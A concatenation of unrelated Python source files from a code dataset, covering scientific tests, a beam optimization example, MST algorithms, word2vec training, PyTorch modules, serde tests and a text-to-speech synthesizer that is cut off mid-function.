
        The string sentinel (rather than ``float('inf')``) is the original,
        caller-visible contract and is kept for backward compatibility.
        """
        try:
            return a / b
        except ZeroDivisionError:
            return 'inf'

    def avg(self,
            iterable: Iterable,
            upper: Optional[int] = None,
            lower: Optional[int] = None) -> float:
        """Average of the values, keeping only values < upper and > lower.

        Fixes/generalizations over the original:
        - accepts any iterable (including one-shot generators) by
          materializing it once; the original called ``len()`` on the raw
          iterable, which failed for generators when no bound was given;
        - bounds are applied when they are not None, so a bound of 0 is
          honored instead of being silently ignored (falsy-check bug).

        Returns 0 when no values survive the filters.
        """
        values = list(iterable)
        if upper is not None:
            values = [v for v in values if v < upper]
        if lower is not None:
            values = [v for v in values if v > lower]
        if not values:
            return 0
        return sum(values) / len(values)
| StarcoderdataPython |
1689042 | # unittest file for sampling of rotation space SO(3)
import sys
sys.path.append('../')
import pyEMsoft
import numpy as np
import unittest
from random import randint
class Test_SO3(unittest.TestCase):
    """Exercises pyEMsoft SO(3) rotation-space sampling helpers.

    Fix: dataset-contamination tokens fused onto the final line made the
    module a syntax error; the code is otherwise unchanged. Note that
    test_01 is interactive (reads a point group from stdin).
    """
    def setUp(self):
        pass
    def test_01_IsinsideFZ(self):
        """Check whether a random rotation lies inside the fundamental zone
        of an interactively chosen point group."""
        # default integer seed vector
        seed = pyEMsoft.rng.rng_t()
        print('The default seed vector:', seed, '\n')
        # seeds the RNG with a single random integer and a default seed vector
        seed_rand_int = randint(1, 100000000)
        pyEMsoft.rng.rng_seed(seed, seed_rand_int)
        print('The new seed vector:', seed, '\n')
        q_rand = pyEMsoft.quaternions.quat_marsaglia(seed)
        print('Random quaternion using the Marsaglia approach', q_rand, '\n', '\n')
        # quaternion to Rodrigues coordinates conversion
        rod = pyEMsoft.rotations.qu2ro(q_rand)
        # now pick the point group (interactive prompt)
        pyEMsoft.symmetry.listpointgroups()
        point_group_number = input('\nSelect a point group:')
        print('Point group selected is', point_group_number, '\n')
        # now get the FZ type and order
        fztype, fzorder = pyEMsoft.so3.getfztypeandorder(point_group_number)
        print('FZ type and order for the selected point group ', point_group_number, 'is', fztype, 'and', fzorder, '\n')
        # is it inside the FZ? return a boolean
        insideFZ = pyEMsoft.so3.isinsidefz(rod, fztype, fzorder)
        print('Does Rodrigues point', rod, 'lie in the FZ? \nAnswer: %s' % bool(insideFZ), '\n')
    def test_02_CubochoricNeighbors(self):
        """Compute cubochoric coordinates of the grid neighbors of a fixed
        quaternion's cubochoric image."""
        # define an arbitrary quaternion
        q = np.asarray([1, 2, 3, 4], dtype=np.float64)
        # normalization of quaternion
        q = q / pyEMsoft.quaternions.cabs(q)
        # convert to cubochoric coordinates
        cub = pyEMsoft.rotations.qu2cu(q)
        # number of nearest neighbors in each direction (odd count => symmetric mesh)
        nn = 1
        # output buffer must be Fortran-ordered for the f2py-wrapped routine
        cubneighbor = np.asfortranarray(np.zeros([3, (2 * nn + 1) ** 3]), dtype=np.float64)
        # get the cubochoric coordinates of the neighbors
        pyEMsoft.so3.cubochoricneighbors(cubneighbor, nn, cub, 0.1)
        print('Cubochoric coordinates of the neighbors:\n', cubneighbor, '\n')
if __name__ == '__main__':
    unittest.main()
3326662 | """
This example demonstrates TACS structural optimization capabilities.
The beam model that we will be using for this problem is a rectangular beam,
cantilevered, with a shear load applied at the tip. The beam is discretized using
1001 shell elements along it's span and depth.
The optimization problem is as follows:
Minimize the mass of the beam with respect to the depth of the cross-section along the span,
subject to a max stress constraint dictated by the materials yield stress.
In order to change the shape of the FEM we use a free-form deformation (FFD) volume
parmeterization scheme provided by the pyGeo library.
An aproximate analytical solution can be derived from beam theory,
by realizing that the stress at any spanwise cross-section in the beam
can be found independently using:
sigma(x,y) = y*M(x)/I
An analytical solution for this problem can be shown to be:
d(x) = sqrt(6*V*(L-x)/(t*sigma_y))
The optimization is setup using TACS' MPHYS module, which acts as a wrapper
for OpenMDAO.
"""
import numpy as np
import matplotlib.pyplot as plt
import os
import openmdao.api as om
from pygeo.mphys import OM_DVGEOCOMP
from mphys import Multipoint
from mphys.scenario_structural import ScenarioStructural
from tacs.mphys import TacsBuilder
from tacs import elements, constitutive, functions
# Input files resolved relative to this script's directory.
bdf_file = os.path.join(os.path.dirname(__file__), 'Slender_Beam.bdf')
ffd_file = os.path.join(os.path.dirname(__file__), 'ffd_8_linear.fmt')
# Beam thickness
t = 0.01 # m
# Length of beam
L = 1.0
# Material properties (aluminum-like; E and ys in Pa)
rho = 2780.0 # kg /m^3
E = 70.0e9
nu = 0.0
ys = 420.0e6
# Shear force applied at tip (N)
V = 2.5E4
def element_callback(dvNum, compID, compDescript, elemDescripts, specialDVs, **kwargs):
    """TACS callback: build the Quad4 shell element for each mesh component."""
    # Isotropic material and a shell constitutive with fixed thickness t
    # (thickness is not a design variable here: tNum=-1).
    material = constitutive.MaterialProperties(rho=rho, E=E, nu=nu, ys=ys)
    shell_con = constitutive.IsoShellConstitutive(material, t=t, tNum=-1)
    # TACS shells can be overly rigid in shear; soften the drilling term.
    shell_con.setDrillingRegularization(0.1)
    ref_axis = np.array([1.0, 0.0, 0.0])
    shell_transform = elements.ShellRefAxisTransform(ref_axis)
    return elements.Quad4Shell(shell_transform, shell_con)
def problem_setup(scenario_name, fea_assembler, problem):
    """Attach output functions and the fixed tip shear load to a structural
    problem created by the TACS builder."""
    # Output functions: total mass and a KS-aggregated von Mises failure.
    problem.addFunction('mass', functions.StructuralMass)
    problem.addFunction('ks_vmfailure', functions.KSFailure,
                        safetyFactor=1.0, ksWeight=100.0)
    # Tip shear V applied in y at NASTRAN node 1112.
    problem.addLoadToNodes(1112, [0.0, V, 0.0, 0.0, 0.0, 0.0],
                           nastranOrdering=True)
class Top(Multipoint):
    """MPHYS multipoint model: mesh -> FFD geometry -> structural scenario."""
    def setup(self):
        tacs_options = {'element_callback': element_callback,
                        'problem_setup': problem_setup,
                        'mesh_file': bdf_file}
        # Initialize MPHYS builder for TACS (uncoupled, structures only)
        struct_builder = TacsBuilder(tacs_options, coupled=False)
        struct_builder.initialize(self.comm)
        # Add mesh component
        self.add_subsystem('mesh', struct_builder.get_mesh_coordinate_subsystem())
        # add the geometry component, we dont need a builder because we do it here.
        self.add_subsystem("geometry", OM_DVGEOCOMP(ffd_file=ffd_file))
        self.geometry.nom_add_discipline_coords("struct")
        self.mphys_add_scenario('tip_shear', ScenarioStructural(struct_builder=struct_builder))
        # Wire mesh coords through the FFD deformation into the scenario.
        self.connect("mesh.x_struct0", "geometry.x_struct_in")
        self.connect("geometry.x_struct0", "tip_shear.x_struct0")
    def configure(self):
        # Create reference axis along the beam span (i-direction, mid-depth)
        nRefAxPts = self.geometry.nom_addRefAxis(name="centerline", alignIndex='i', yFraction=0.5)
        # Global DV: per-station y-scaling of the FFD = local beam depth
        def depth(val, geo):
            for i in range(nRefAxPts):
                geo.scale_y["centerline"].coef[i] = val[i]
        self.geometry.nom_addGeoDVGlobal(dvName="depth", value=np.ones(nRefAxPts), func=depth)
################################################################################
# OpenMDAO setup
################################################################################
# Instantiate OpenMDAO problem
prob = om.Problem()
prob.model = Top()
model = prob.model
# Declare design variables, objective, and constraint:
# minimize mass w.r.t. spanwise depth, subject to KS failure <= 1.
model.add_design_var('geometry.depth', lower=1e-3, upper=10.0, scaler=20.0)
model.add_objective('tip_shear.mass', scaler=1.0)
model.add_constraint('tip_shear.ks_vmfailure', lower=0.0, upper=1.0, scaler=1.0)
# Configure optimizer (gradient-based SLSQP via SciPy)
prob.driver = om.ScipyOptimizeDriver(debug_print=['objs', 'nl_cons'], maxiter=1000)
prob.driver.options['optimizer'] = 'SLSQP'
# Setup OpenMDAO problem
prob.setup()
# Output N2 representation of OpenMDAO model
om.n2(prob, show_browser=False, outfile='beam_opt_n2.html')
# Run optimization
prob.run_driver()
| StarcoderdataPython |
22830 | <reponame>alexk307/server-exercise<gh_stars>0
from requests import post
from random import randrange
from uuid import uuid4
import base64
import json
PORT = 6789
MAX_SIZE_UDP = 65535
HEADER_SIZE = 12
NUM_TRANSACTIONS = 10
SERVER = 'http://localhost:1234/add'
def main():
    """Send NUM_TRANSACTIONS payloads to the server, each split into randomly
    sized index chunks POSTed one fragment at a time.

    Fixes for Python 3 compatibility (the original was Python 2 remnants):
    - ``xrange`` -> ``range`` (NameError on py3);
    - ``base64.b64encode`` requires bytes, so the payload is encoded first;
    - the b64 result is decoded to str so ``json.dumps`` can serialize it.
    """
    for _ in range(NUM_TRANSACTIONS):
        # Pseudo-random transaction ID shared by all fragments of one payload
        transaction_id = randrange(1, 100)
        payload = str(uuid4())
        # Break the index space into randomly sized pieces
        indexes = range(1000)
        pieces = randrange(1, 100)
        chunks = [indexes[i:i + pieces] for i in range(0, len(indexes), pieces)]
        for chunk in chunks:
            fragment = {
                'offset': chunk[-1],
                'trans_id': transaction_id,
                'payload': base64.b64encode(payload.encode('utf-8')).decode('ascii'),
                'size': len(chunk),
            }
            post(SERVER, json.dumps(fragment))

if __name__ == '__main__':
    main()
| StarcoderdataPython |
3303697 | """
given an integer, write a function to determine if it is a power of two
"""
def is_power_of_two(n):
    """
    :type n: int
    :rtype: bool
    """
    # A power of two has exactly one set bit; n & (n - 1) clears the lowest
    # set bit, so it is zero only for powers of two. Reject zero/negatives.
    if n <= 0:
        return False
    return n & (n - 1) == 0
| StarcoderdataPython |
137699 | <reponame>wull566/tensorflow_demo
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import os
import sys
import multiprocessing
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
if __name__ == '__main__':
    # Train a skip-gram word2vec model on the text8 corpus and save both the
    # full model and the plain-text vectors.
    # Fixes: stripped dataset-contamination tokens fused onto the final line
    # (a runtime error) and translated the Chinese comments to English.
    program = os.path.basename(sys.argv[0])
    logger = logging.getLogger(program)
    logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')
    logging.root.setLevel(level=logging.INFO)
    logger.info("running %s" % ' '.join(sys.argv))
    # check and process input arguments
    # if len(sys.argv) < 4:
    #     print(globals()['__doc__'] % locals())
    #     sys.exit(1)
    # inp, outp1, outp2 = sys.argv[1:4]
    inp, outp1, outp2 = 'data/text8', 'work/text8.model', 'work/text8.vector'
    model = Word2Vec(LineSentence(inp), size=800, window=10, min_count=5, sg=1, hs=1,
                     workers=multiprocessing.cpu_count())
    # size: dimensionality of the learned word vectors
    # window: training context window; 10 means up to 10 words before/after
    #         (gensim samples an effective window size per target word)
    # window: typically around 10 for skip-gram (sg=1), around 5 for CBOW
    # hs: if 1, hierarchical softmax is used; if 0 (default), negative sampling
    # trim unneeded model memory = use(much) less RAM
    # model.init_sims(replace=True)
    model.save(outp1)
    model.wv.save_word2vec_format(outp2, binary=False)
3247123 | import torch
import torch.nn as nn
from src.utils import ScaleNorm, LayerNorm
class Generator(nn.Module):
    """Readout head: pool per-node states over the sequence (mean / sum /
    dummy-node) and project to ``n_output`` values with an MLP.

    With ``n_layers == 1`` the projection is a single Linear layer; otherwise
    it is (Linear -> LeakyReLU -> norm -> Dropout) x (n_layers - 1) followed
    by a final Linear.  ``scale_norm`` selects ScaleNorm over LayerNorm.
    """

    def __init__(self, d_model, aggregation_type='mean', n_output=1, n_layers=1,
                 leaky_relu_slope=0.01, dropout=0.0, scale_norm=False):
        super(Generator, self).__init__()
        if n_layers == 1:
            self.proj = nn.Linear(d_model, n_output)
        else:
            stack = []
            for _ in range(n_layers - 1):
                stack.append(nn.Linear(d_model, d_model))
                stack.append(nn.LeakyReLU(leaky_relu_slope))
                stack.append(ScaleNorm(d_model) if scale_norm else LayerNorm(d_model))
                stack.append(nn.Dropout(dropout))
            stack.append(nn.Linear(d_model, n_output))
            self.proj = nn.Sequential(*stack)
        self.aggregation_type = aggregation_type

    def forward(self, x, mask):
        # mask: (batch, seq) -> (batch, seq, 1); zero out padded positions.
        pad = mask.unsqueeze(-1).float()
        masked = x * pad
        if self.aggregation_type == 'mean':
            # Average over real (unmasked) positions only.
            pooled = masked.sum(dim=1) / pad.sum(dim=(1))
        elif self.aggregation_type == 'sum':
            pooled = masked.sum(dim=1)
        elif self.aggregation_type == 'dummy_node':
            # First position holds the aggregate "dummy" node state.
            pooled = masked[:, 0]
        return self.proj(pooled)
class PositionGenerator(nn.Module):
    """Project layer-normalized, mask-zeroed node states to per-atom
    coordinates of dimension ``d_atom``."""

    def __init__(self, d_model, d_atom):
        super(PositionGenerator, self).__init__()
        self.norm = LayerNorm(d_model)
        self.proj = nn.Linear(d_model, d_atom)

    def forward(self, x, mask):
        # Zero out padded positions after normalization, then project.
        pad = mask.unsqueeze(-1).float()
        return self.proj(self.norm(x) * pad)
| StarcoderdataPython |
142007 | <reponame>zembrodt/story-generation<gh_stars>1-10
# encoder.py
import torch
import torch.nn as nn
######################################################################
# The Encoder
# -----------
#
# The encoder of a seq2seq network is a RNN that outputs some value for
# every word from the input sentence. For every input word the encoder
# outputs a vector and a hidden state, and uses the hidden state for the
# next input word.
class EncoderRNN(nn.Module):
    """Seq2seq encoder: embed one input token and advance a single-layer GRU,
    returning the output and the new hidden state for the next step."""

    def __init__(self, input_size, hidden_size, embedding_size):
        super(EncoderRNN, self).__init__()
        self.hidden_size = hidden_size
        self.embedding = nn.Embedding(input_size, embedding_size)
        self.gru = nn.GRU(embedding_size, hidden_size)

    def forward(self, input, hidden):
        # Shape the embedded token as (seq_len=1, batch=1, embedding_size).
        step = self.embedding(input).view(1, 1, -1)
        return self.gru(step, hidden)

    def initHidden(self, device):
        """Return an all-zero initial hidden state on *device*."""
        return torch.zeros(1, 1, self.hidden_size, device=device)
1626598 | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 15:31:17 2016
Last update on Saturday 17 March 2018
@author: michielstock
Kruskal's algorithm for finding the maximum spanning tree
"""
from union_set_forest import USF
import heapq
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
# Shared hex color palette for all plots in this module.
blue = '#264653'
green = '#2a9d8f'
yellow = '#e9c46a'
orange = '#f4a261'
red = '#e76f51'
black = '#50514F'
def add_mst_edges(t, mst_edges, coordinates, ax):
    """Animation callback: draw the t-th MST edge as a thick red segment."""
    u, v = mst_edges[t]
    ux, uy = coordinates[u]
    vx, vy = coordinates[v]
    ax.plot([ux, vx], [uy, vy], color=red, lw=5, zorder=1)
def make_mst_animation(coordinates, edges, mst_edges, fig, ax):
    """Animate the MST growing edge by edge on top of the full graph.

    One animation frame per MST edge; each frame draws a single red segment
    over the grey background graph."""
    # Background: all graph edges in grey.
    for _, u, v in edges:
        (ux, uy), (vx, vy) = coordinates[u], coordinates[v]
        ax.plot([ux, vx], [uy, vy], color='grey', alpha=0.7, lw=2, zorder=1)
    # Vertices drawn above the edges.
    for px, py in coordinates:
        ax.scatter(px, py, color=green, s=50, zorder=2)
    anim = FuncAnimation(fig,
                         lambda t: add_mst_edges(t, mst_edges, coordinates, ax),
                         frames=range(len(mst_edges)), interval=100)
    ax.set_yticks([])
    ax.set_xticks([])
    return anim
def edges_to_adj_list(edges):
    """
    Turns a list of edges in an adjecency list (implemented as a dict).
    Edges don't have to be doubled, will automatically be symmetric

    Input:
        - edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
                    edge from node A to node B with weigth 0.7)

    Output:
        - adj_list : a dict of a set of weighted edges
    """
    adj_list = {}
    # Insert each undirected edge in both directions.
    for weight, u, v in edges:
        adj_list.setdefault(u, set()).add((weight, v))
        adj_list.setdefault(v, set()).add((weight, u))
    return adj_list
def adj_list_to_edges(adj_list):
    """
    Turns an adjecency list into a list of edges.

    Input:
        - adj_list : a dict of a set of weighted edges

    Output:
        - edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
                    edge from node A to node B with weigth 0.7)
    """
    # For each vertex v, every neighbor entry (w, u) becomes edge (w, u, v).
    return [(w, u, v)
            for v, neighbours in adj_list.items()
            for w, u in neighbours]
def prim(vertices, edges, start, add_weights=False):
    """
    Prim's algorithm for finding a minimum spanning tree.

    Inputs :
        - vertices : a set of the vertices of the Graph
        - edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
                    edge from node A to node B with weigth 0.7)
        - start : the vertex to grow the tree from
        - add_weights : add the weigths to the edges? default: False

    Output:
        - edges : a minumum spanning tree represented as a list of edges
                (weighted if `add_weights` is set to True)
        - total_cost : total cost of the tree
    """
    adj_list = edges_to_adj_list(edges)
    # Min-heap of frontier edges as (cost, vertex_in_tree, candidate_vertex).
    to_check = [(w, start, v_new) for w, v_new in adj_list[start]]
    heapq.heapify(to_check)
    # for every node connected to the
    #dist_to_mst = {i : (w, start) for w, i in adj_list.pop(start)}
    mst_edges = []
    mst_vertices = set([start])
    total_cost = 0
    while to_check:
        cost, v_in_mst, v_new = heapq.heappop(to_check)
        # Lazy deletion: a vertex may be queued several times; only the
        # first (cheapest) pop is used, later pops are skipped here.
        if v_new not in mst_vertices:
            # add to mst
            if add_weights:
                mst_edges.append((cost, v_in_mst, v_new))
            else:
                mst_edges.append((v_in_mst, v_new))
            mst_vertices.add(v_new)
            total_cost += cost
            # Push all edges leaving the newly added vertex onto the frontier.
            for cost, v in adj_list[v_new]:
                heapq.heappush(to_check, (cost, v_new, v))
    return mst_edges, total_cost
def kruskal(vertices, edges, add_weights=False):
    """
    Kruskal's algorithm for finding a minimum spanning tree.

    Inputs :
        - vertices : a set of the vertices of the Graph
        - edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
                    edge from node A to node B with weigth 0.7)
        - add_weights : add the weigths to the edges? default: False

    Output:
        - edges : a minumum spanning tree represented as a list of edges
                (weighted if `add_weights` is set to True)
        - total_cost : total cost of the tree
    """
    forest = USF(vertices)
    mst_edges = []
    total_cost = 0
    # Scan edges by increasing weight; keep an edge iff it joins two
    # different components of the union-find forest. sorted() works on a
    # copy, so the caller's edge container is left untouched.
    for cost, v1, v2 in sorted(edges):
        if forest.find(v1) != forest.find(v2):
            mst_edges.append((cost, v1, v2) if add_weights else (v1, v2))
            forest.union(v1, v2)
            total_cost += cost
    del forest
    return mst_edges, total_cost
if __name__ == '__main__':
    # Retired demos kept as an inert string literal (word-graph MST and a
    # random-maze generator built from a spanning tree of a grid).
    """
    words = ['maan', 'laan', 'baan', 'mama', 'saai', 'zaai', 'naai', 'baai',
            'loon', 'boon', 'hoon', 'poon', 'leem', 'neem', 'peen', 'tton',
            'haar', 'haar', 'hoor', 'boor', 'hoer', 'boer', 'loer', 'poer']

    hamming = lambda w1, w2 : sum([ch1 != ch2 for ch1, ch2 in zip(w1, w2)])

    edges = [(hamming(w1, w2), w1, w2) for w1 in words
                    for w2 in words if w1 is not w2]

    tree = kruskal(words, edges)
    print(tree)

    import networkx

    g = networkx.Graph()
    g.add_edges_from(tree)

    labels = {n:n for n in g.nodes()}

    networkx.draw(g, networkx.spring_layout(g))

    # draw maze
    import numpy as np

    size = 50

    M = np.random.randn(size, size)

    vertices = [(i, j) for i in range(size) for j in range(size)]
    edges = [(abs(M[i1, j1] - M[i2, j2]), (i1, j1), (i2, j2)) for i1,
                j1 in vertices for i2, j2 in vertices if abs(i1-i2) +
                abs(j1-j2) == 1 if (i1, j1) != (i2, j2)]

    maze_links = kruskal(vertices, edges)

    import matplotlib.pyplot as plt

    fig, ax = plt.subplots(figsize=(10,10))
    ax.set_axis_bgcolor('black')

    for (i1, j1), (i2, j2) in maze_links:
        ax.plot([i1, i2], [j1, j2], c='white', lw=5)

    fig.savefig('maze.pdf')
    """
    import json
    import matplotlib.pyplot as plt

    # Load the example graph (vertex coordinates + weighted edge list).
    with open('Data/example_graph.json', 'r') as fp:
        example_graph = json.load(fp)

    coordinates = example_graph['coordinates']
    edges = example_graph['edges']
    vertices = set([i for d, i, j in edges])

    # Compute the MST with both algorithms for comparison.
    edges_kruskal, cost_kruskal = kruskal(vertices, edges)
    edges = example_graph['edges']
    edges_prim, cost_prim = prim(vertices, edges, 1)

    # Static figure: full graph in grey, Kruskal MST in red, vertices in green.
    for d, i, j in edges:
        xi1, xi2 = coordinates[i]
        xj1, xj2 = coordinates[j]
        plt.plot([xi1, xj1], [xi2, xj2], color='grey', alpha=0.7, lw=2, zorder=1)

    for i, j in edges_kruskal:
        xi1, xi2 = coordinates[i]
        xj1, xj2 = coordinates[j]
        plt.plot([xi1, xj1], [xi2, xj2], color=red, lw=5, zorder=2)

    for x1, x2 in coordinates:
        plt.scatter(x1, x2, color=green, s=50, zorder=3)

    plt.xticks([])
    plt.yticks([])
    plt.savefig('Figures/mst_example.png')

    # make animations (one GIF per algorithm)
    fig, ax = plt.subplots()
    anim = make_mst_animation(coordinates, edges, edges_kruskal, fig, ax)
    anim.save('Figures/kruskal.gif', dpi=80, writer='imagemagick')

    fig, ax = plt.subplots()
    anim = make_mst_animation(coordinates, edges, edges_prim, fig, ax)
    anim.save('Figures/prim.gif', dpi=80, writer='imagemagick')
| StarcoderdataPython |
3338634 | <filename>xrpc_tests/serde/test_generic.py
from typing import TypeVar, Generic
from dataclasses import dataclass
from xrpc.const import SERVER_SERDE_INST
from xrpc.serde.abstract import SerdeSet
from xrpc.serde.error import SerdeException
from xrpc.serde.types import CallableArgsWrapper, CallableRetWrapper
from xrpc_tests.mp.abstract import ProcessHelperCase
T = TypeVar('T')
@dataclass
class Obj(Generic[T]):
    """Minimal generic dataclass used to exercise serde of parametrized types."""
    # single generic payload field; the default of 0 assumes a numeric T
    i: T = 0
class Runner(Generic[T]):
    """Generic class whose method signatures reference the type variable T."""
    def method(self, a: int, b: str) -> T:
        """Stub: T appears only in the return annotation."""
        pass
    def method2(self, a: int, b: T) -> bool:
        """Stub: T appears only in a parameter annotation."""
        pass
def build_worker_serde():
    """Build the serde struct for Obj[int] via walk -> merge -> struct."""
    walked = SerdeSet.walk(SERVER_SERDE_INST, Obj[int])
    # merging the set with itself exercises merge() without changing content
    merged = walked.merge(walked)
    return merged.struct(SERVER_SERDE_INST)
def dir_items(x):
    """Yield (name, value) pairs for every attribute name reported by dir(x)."""
    return ((attr, getattr(x, attr)) for attr in dir(x))
class TestGeneric(ProcessHelperCase):
    """Exercises serde round-trips for generic dataclasses and generic methods."""
    def test_pickle_0(self):
        """Smoke test: Obj[int] deserializes and serializes without raising."""
        WorkerSerde = build_worker_serde()
        # import pickle
        # pickle.dumps(WorkerSerde)
        WorkerSerde.deserialize(Obj[int], {'i': 5})
        WorkerSerde.serialize(Obj[int], Obj(5))
    def test_pickle_1(self):
        """Same as test_pickle_0 but binds results (values are not asserted)."""
        WorkerSerde = build_worker_serde()
        # import pickle
        # pickle.dumps(WorkerSerde)
        x = WorkerSerde.deserialize(Obj[int], {'i': 5})
        y = WorkerSerde.serialize(Obj[int], Obj(5))
    def test_generic_method(self):
        """Serde of a method whose parameter type is the type variable T.
        NOTE(review): if serialize() does not raise below, the except body's
        assertions never run and the test silently passes -- consider
        assertRaises to make the failure expectation explicit.
        """
        fa = CallableArgsWrapper.from_func_cls(Runner[int], Runner.method2)
        a = SerdeSet.walk(
            SERVER_SERDE_INST,
            fa
        )
        # (args, kwargs) payload for method2(a=5, b=7) with T bound to int
        xo = [(5, 7), {}]
        x = a.struct(SERVER_SERDE_INST).serialize(fa, xo)
        y = a.struct(SERVER_SERDE_INST).deserialize(fa, xo)
        self.assertEqual(x, y)
        try:
            # 'asd' is not an int, so serialization should fail for T=int
            a.struct(SERVER_SERDE_INST).serialize(fa, [(5, 'asd'), {}])
        except SerdeException as e:
            self.assertEqual('asd', e.resolve().val)
            self.assertEqual('int', e.resolve().kwargs['t'])
    def test_generic_method_ret(self):
        """Serde of a method whose return type is the type variable T.
        NOTE(review): same silent-pass caveat as test_generic_method.
        """
        fa = CallableRetWrapper.from_func_cls(Runner[int], Runner.method)
        a = SerdeSet.walk(
            SERVER_SERDE_INST,
            fa
        )
        xo = 8
        x = a.struct(SERVER_SERDE_INST).serialize(fa, xo)
        y = a.struct(SERVER_SERDE_INST).deserialize(fa, xo)
        self.assertEqual(x, y)
        try:
            # a str return value should be rejected when T is bound to int
            a.struct(SERVER_SERDE_INST).serialize(fa, 'str')
        except SerdeException as e:
            self.assertEqual('str', e.resolve().val)
            self.assertEqual('int', e.resolve().kwargs['t'])
| StarcoderdataPython |
3273722 | <gh_stars>100-1000
"""
Spokestack-Lite Speech Synthesizer
This module contains the SpeechSynthesizer class used to convert text to speech
using local TTS models trained on the Spokestack platform. A SpeechSynthesizer
instance can be passed to the TextToSpeechManager for playback.
Example:
This example assumes that a TTS model was downloaded from the Spokestack
platform and extracted to the :code:`model` directory. ::
from spokestack.io.pyaudio import PyAudioOutput
from spokestack.tts.manager import TextToSpeechManager, FORMAT_PCM16
from spokestack.tts.lite import SpeechSynthesizer, BLOCK_LENGTH, SAMPLE_RATE
tts = TextToSpeechManager(
SpeechSynthesizer("./model"),
PyAudioOutput(sample_rate=SAMPLE_RATE, frames_per_buffer=BLOCK_LENGTH),
format_=FORMAT_PCM16)
tts.synthesize("Hello world!")
"""
import importlib
import json
import os
import re
import typing as T
from collections import defaultdict
import numpy as np
from spokestack.models.tensorflow import TFLiteModel
# signal configuration
SAMPLE_RATE = 24000  # output audio sample rate in Hz (passed to the audio sink)
HOP_LENGTH = 240  # audio samples produced per decoder frame
ENCODER_PAD = -2  # fill value when padding partial decoder inputs
BREAK_LENGTH = 0.1  # silence appended after each sentence, in seconds
# streaming/cross-fading configuration
FRAME_LENGTH = 63  # encoder frames decoded per streamed block
FRAME_OVERLAP = 1  # frames shared between consecutive blocks for cross-fading
BLOCK_LENGTH = FRAME_LENGTH * HOP_LENGTH  # samples per streamed audio block
BLOCK_OVERLAP = FRAME_OVERLAP * HOP_LENGTH  # samples cross-faded between blocks
FADE_OUT = np.linspace(1, 0, BLOCK_OVERLAP, dtype=np.float32)  # linear ramp 1 -> 0
FADE_IN = FADE_OUT[::-1]  # linear ramp 0 -> 1
class SpeechSynthesizer:
    """
    A lightweight on-device text-to-speech synthesizer.
    Text is cleaned and tokenized by a language-specific NLP module, mapped to
    symbol ids, then run through three TFLite models (aligner -> encoder ->
    decoder); decoder output is streamed as cross-faded PCM-16 blocks.
    Args:
        model_path (str): Path to the extracted TTS model downloaded from the
            Spokestack platform
    """
    def __init__(self, model_path: str):
        # load NLP configuration
        self._lexicon = _load_lexicon(os.path.join(model_path, "lexicon.txt"))
        with open(os.path.join(model_path, "metadata.json")) as file:
            metadata = json.load(file)
        lang = metadata["language"]
        # maps each symbol of the model's alphabet to its integer id
        self._sym_to_id = {s: i for i, s in enumerate(metadata["alphabet"])}
        # language-specific cleaning/tokenization module, selected by metadata
        self._language: T.Any = importlib.import_module(f"spokestack.tts.lite.{lang}")
        self._nlp = self._language.nlp()
        # load the TTS models
        self._aligner = TFLiteModel(os.path.join(model_path, "align.tflite"))
        self._encoder = TFLiteModel(os.path.join(model_path, "encode.tflite"))
        self._decoder = TFLiteModel(os.path.join(model_path, "decode.tflite"))
        # input tensor indices, used to resize models for variable-length text
        self._aligner_input_index = self._aligner.input_details[0]["index"]
        self._encoder_input_index = self._encoder.input_details[0]["index"]
    def synthesize(
        self, utterance: str, *_args: T.List, **_kwargs: T.Dict
    ) -> T.Iterator[np.array]:
        """
        Synthesize a text utterance to speech audio
        Args:
            utterance (str): The text string to synthesize
        Returns:
            Iterator[np.array]: A generator that returns a sequence of
            PCM-16 numpy audio blocks for playback, storage, etc.
        """
        # segment sentences into a list of phoneme/grapheme lists
        for tokens in self._parse(utterance):
            # convert tokens to a vector of ids
            inputs = self._vectorize(tokens)
            # run the aligner model
            self._aligner.resize(self._aligner_input_index, inputs.shape)
            inputs = self._aligner(inputs)[0]
            # run the encoder model
            self._encoder.resize(self._encoder_input_index, inputs.shape)
            encoded = self._encoder(inputs)[0]
            # stream the decoder model and cross-fade the output audio
            overlap = np.zeros([BLOCK_OVERLAP], dtype=np.float32)
            for i in range(FRAME_OVERLAP, len(encoded), FRAME_LENGTH):
                # decode the current frame, padding as need to fill the decoder's input
                inputs = encoded[i - FRAME_OVERLAP : i + FRAME_LENGTH]
                inputs = np.pad(
                    inputs,
                    [(0, (FRAME_LENGTH + FRAME_OVERLAP) - len(inputs)), (0, 0)],
                    "constant",
                    constant_values=ENCODER_PAD,
                )
                outputs = self._decoder(inputs)[0]
                # fade in the new block, convert to int16 and return it
                overlap += outputs[:BLOCK_OVERLAP] * FADE_IN
                block = np.hstack([overlap, outputs[BLOCK_OVERLAP:-BLOCK_OVERLAP]])
                # scale float samples by 2**15 - 1 to fill the int16 range
                yield (block * (2 ** 15 - 1)).astype(np.int16)
                # fade out the previous block for mixing with the next block
                overlap = outputs[-BLOCK_OVERLAP:] * FADE_OUT
            # add a break after each segment
            yield np.zeros([int(BREAK_LENGTH * SAMPLE_RATE)], dtype=np.int16)
    def _parse(self, text: str) -> T.Iterator[str]:
        """Yield one normalized string per sentence, with words found in the
        lexicon rewritten as {ipa} phonetic spans."""
        # perform language-specific number conversions, abbreviation expansions, etc.
        text = self._language.clean(text)
        # escape characters used for phonetic substitution
        text = re.sub(r"{", "[", text)
        text = re.sub(r"}", "]", text)
        # segment and tokenize the text, and convert words to their phonetic
        # representations using the attached lexicon
        for sentence in self._nlp(text).sents:
            tokens = []
            for token in sentence:
                if token.pos_ in ["SYM", "PUNCT"]:
                    tokens.append(token.text_with_ws)
                else:
                    # prefer the POS-tag-specific pronunciation, falling back
                    # to the tag-less (None) entry if one exists
                    entry = self._lexicon.get(token.text.lower(), {})
                    ipa = entry.get(token.tag_, entry.get(None))
                    tokens.append(
                        f"{{{ipa}}}{token.whitespace_}" if ipa else token.text_with_ws
                    )
            # merge adjacent phonetic spans ("} {" collapses to a space)
            yield re.sub(r"}\s+{", " ", "".join(tokens))
    def _vectorize(self, text: str) -> np.array:
        """Convert a parsed sentence to an int32 id vector bracketed by the
